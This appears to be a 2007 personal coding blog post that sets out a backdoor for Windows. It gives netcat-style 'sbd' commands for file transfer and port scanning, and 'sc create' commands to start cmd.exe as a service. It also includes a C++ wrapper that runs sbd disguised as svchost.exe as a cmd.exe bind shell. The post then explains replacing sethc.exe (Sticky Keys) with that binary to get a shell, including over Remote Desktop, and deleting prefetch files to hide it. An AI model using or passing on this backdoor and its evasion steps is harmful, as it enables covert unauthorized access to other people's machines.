Fork me on GitHub
Its the Code garbage collector. Mind dumps of daily coding antics from a frustrated silly little man. VBS, PHP, TCL, TK, PERL, C++, JAVA....what now? Ruby?
No Wait.. It should be just RUBY!

20070308

sbd fun as a rookit via sethc.exe

SBD Fun

Transfering files
RCV: sbd -l -p 4337 > outputfile
XMIT: cat infile | sbd 127.0.0.1 4337 –q 10


Transfering files through .tar.gz
RCV: sbd -l -p 4337 | tar xvfpz –
XMT: tar zcfp - /path/to/directory | sbd -w 3 127.0.0.1 4337


PORT Scan:
echo EXIT | sbd -v -w 1 127.0.0.1 20-250 500-600 5990-7000


Using Cmd.exe to bind to service
In my experience this is flaky at best..

create then start service:
sc create testsvc binpath= "cmd /K start" type= interact
sc start testsvc


Note that this time, the SC START immediately creates a new CMD window, even if the original CMD window failed to start with error 1053 (this is expected since CMD.EXE doesn’t have any service related code in it).

SCM starts a service
RegisterServiceCtrlHandler API

We may want to fix any C program to actually handle the correct calls if loading them as a legitimate service.

Simple C++ sbd wrapper
(Rename sbdbg.exe to svchost in this example.)
#include <cstdlib>
#include <iostream>

using namespace std;

int main(int argc, char *argv[])
{
// Lets restrict address to localhost only.. pls.
system("c:\\tmp\\svchost.exe -l -p 4337 -a 127.0.0.1 -e cmd.exe -r0");
return EXIT_SUCCESS;
}


Rootkit portion
Rename output binary to sethc.exe .. works ok.

Prefetch restrictions.
Remember to delete any exisiting sethc.exe files in c:\windows\prefetch prior to use.

Interesting Note about RDC
Sticky Keys [left-shift x5](sethc.exe) works through Remote Desktop Connections(RDC/RDP). Funny how suddenly that makes this all the more interesting.

Apparently the SYSTEM Kernel security shuts down all unknown process on sweep @5 minutes into session.

Can there fake handler for WM_CLOSE? or terminate...

No comments: